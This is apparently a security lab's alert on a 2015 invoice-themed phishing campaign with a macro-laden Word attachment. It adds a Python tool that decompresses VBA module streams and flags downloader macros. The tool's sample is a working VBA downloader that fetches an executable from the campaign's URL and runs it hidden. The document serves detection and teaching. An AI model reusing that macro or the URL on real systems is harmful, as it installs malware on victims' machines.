MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Documentation: Your Order Ref: SGM249/013”.
This email is sent from the spoofed address “Jonathan Carroll <Jonathan@john-s-shackleton.co.uk>” and has the following body:
Your Order: SGM249/013
Our Order: 345522
Advice Note: 355187
Despatch Date: 22/12/15
s547369.DOC Shackleton Invoice Number 355187
John S. Shackleton (Sheffield) Ltd
4 Downgate Drive
Tel: 0114 244 4767
Fax: 0114 242 5965
Phone us for a free stock brochure.
Our product range includes: Beams, Columns, Pfc’s, Channels, Flats, Rounds, Squares, Angles, Tees, Convex, ERW Tubes, Hollow Section, Cold Reduced Sheet, Hot Rolled Sheet Galvanised Sheet, Zintec Sheet, Floorplate, Open Mesh Flooring, Handrail Standards, Tube, Tubeclamps. Welded Mesh, Expanded Metal, Perforated Sheet, U Edging, Fencing and Bright Bar.
Our Terms and Conditions of Sale apply to all quotations and the supply of all goods. Copies of our Terms and Conditions of Sale are available on request or can be found on our website www.johnsshackleton.co.uk . These Terms and Conditions include a provision (see term 12) that title to goods supplied shall not pass to a customer until payment is received by us in full for all goods supplied. We only accept orders for the supply of goods on the basis our Terms and Conditions of Sale apply.
The attached file s547369.DOC is a Word document with an embedded malicious macro.
The macro is detected as HEUR.VBA.Trojan, Trojan:W97M/MaliciousMacro.GEN or heur.macro.download.cc by 4 of the 54 AV engines at VirusTotal.
The macro acts as a downloader: it retrieves the payload from wattplus.net/98g654d/4567gh98.exe
The file 4567gh98.exe is detected as Trojan.Win32.Injector.cdgy (v), PE:Malware.Obscure!1.9C59 [F] or UDS:DangerousObject.Multi.Generic by 6 of the 55 AV engines at VirusTotal.
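The post records only that the macro in s547369.DOC fetches 4567gh98.exe from the URL above. The Python below is an added example, not MX Lab's code and not the real macro: it decompresses a VBA module stream stored in the MS-OVBA CompressedContainer format that Word uses inside the document's VBA storage (the same format olevba decodes), then scans the recovered source for the downloader pattern: an auto-exec entry point, a download API, something that runs the result, and an embedded URL. The macro text is constructed to mirror the behaviour described, and compress_vba exists only to build that sample; against a real file you would read the module stream out of the OLE container, starting at the module's text offset, and hand it to decompress_vba.

```python
"""Added example, not MX Lab's code and not the real s547369.DOC macro: recover VBA source from
a module stream stored in MS-OVBA CompressedContainer format, then triage it for the downloader
pattern the post describes (auto-exec trigger, download API, execution, embedded URL)."""
import re
import struct

def _copytoken_help(difference):
    """CopyToken bit layout depends on how far into the chunk the output is (MS-OVBA 2.4.1)."""
    bit_count = max((difference - 1).bit_length(), 4)   # ceil(log2(difference)), minimum 4
    length_mask = 0xFFFF >> bit_count
    return length_mask, (~length_mask) & 0xFFFF, bit_count

def decompress_vba(data):
    """Container: 0x01, then chunks of a 2-byte header (bit 15 compressed, bits 12-14 0b011,
    bits 0-11 size-3) and token groups of one flag byte plus 8 literal (1 B) or copy (2 B) tokens."""
    if data[:1] != b"\x01":
        raise ValueError("missing CompressedContainer signature byte")
    out, pos = bytearray(), 1
    while pos < len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        if (header >> 12) & 0x7 != 0x3:
            raise ValueError("bad CompressedChunk signature")
        chunk_end = min(pos + (header & 0x0FFF) + 3, len(data))
        compressed, pos, chunk_start = bool(header & 0x8000), pos + 2, len(out)
        if not compressed:                      # stored chunk: 4096 raw bytes
            out += data[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags, pos = data[pos], pos + 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:      # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token, pos = struct.unpack_from("<H", data, pos)[0], pos + 2
                length_mask, offset_mask, bit_count = _copytoken_help(len(out) - chunk_start)
                length = (token & length_mask) + 3
                src = len(out) - (((token & offset_mask) >> (16 - bit_count)) + 1)
                for i in range(length):         # byte-wise: a copy may overlap its own output
                    out.append(out[src + i])
    return bytes(out)

def compress_vba(src):
    """Greedy single-chunk (<= 4096 B) compressor; exists only to build the constructed sample."""
    body, pos = bytearray(), 0
    while pos < len(src):
        flags, tokens = 0, bytearray()
        for bit in range(8):
            if pos >= len(src):
                break
            best_len = best_off = bit_count = 0
            if pos:
                length_mask, _, bit_count = _copytoken_help(pos)
                for off in range(1, pos + 1):
                    n = 0
                    while (n < length_mask + 3 and pos + n < len(src)
                           and src[pos + n] == src[pos - off + n]):
                        n += 1
                    if n > best_len:
                        best_len, best_off = n, off
            if best_len >= 3:
                tokens += struct.pack("<H", ((best_off - 1) << (16 - bit_count)) | (best_len - 3))
                flags |= 1 << bit
                pos += best_len
            else:
                tokens.append(src[pos])
                pos += 1
        body.append(flags)
        body += tokens
    return b"\x01" + struct.pack("<H", 0xB000 | (len(body) - 1)) + body

AUTOEXEC = re.compile(r"\b(AutoOpen|Document_Open|AutoExec|AutoClose|Workbook_Open)\b", re.I)
DOWNLOAD = re.compile(r"\b(URLDownloadToFile|MSXML2\.XMLHTTP|Microsoft\.XMLHTTP|"
                      r"WinHttp\.WinHttpRequest|ADODB\.Stream)\b", re.I)
EXECUTE = re.compile(r"\b(WScript\.Shell|ShellExecute|Shell|CreateObject)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)

def triage_macro(source):
    """List the indicators found; 'downloader' is the combined verdict."""
    text = source.decode("latin-1") if isinstance(source, bytes) else source
    found = {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(text)}),
        "download": sorted({m.group(1) for m in DOWNLOAD.finditer(text)}),
        "execute": sorted({m.group(1) for m in EXECUTE.finditer(text)}),
        "urls": sorted(set(URL.findall(text))),
    }
    found["downloader"] = bool(found["autoexec"] and found["download"] and found["urls"])
    return found

# Constructed macro text: models the behaviour the post describes, not the real s547369.DOC code.
SAMPLE_MACRO = b"""Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    strURL = "http://wattplus.net/98g654d/4567gh98.exe"
    strPath = Environ("TEMP") & "\\4567gh98.exe"
    URLDownloadToFile 0, strURL, strPath, 0, 0
    Shell strPath, vbHide
End Sub
"""
```

Running triage_macro(decompress_vba(compress_vba(SAMPLE_MACRO))) reports the AutoOpen trigger, URLDownloadToFile, Shell and the wattplus.net URL and sets downloader to True. The regex pass only catches what is in clear text: campaign macros of this kind usually assemble the URL and API names from concatenated fragments, Chr() calls or StrReverse, which is why olevba pairs the same keyword scan with string deobfuscation. Treat the verdict as a triage hint, and use the extracted URL for blocking and hunting rather than fetching it.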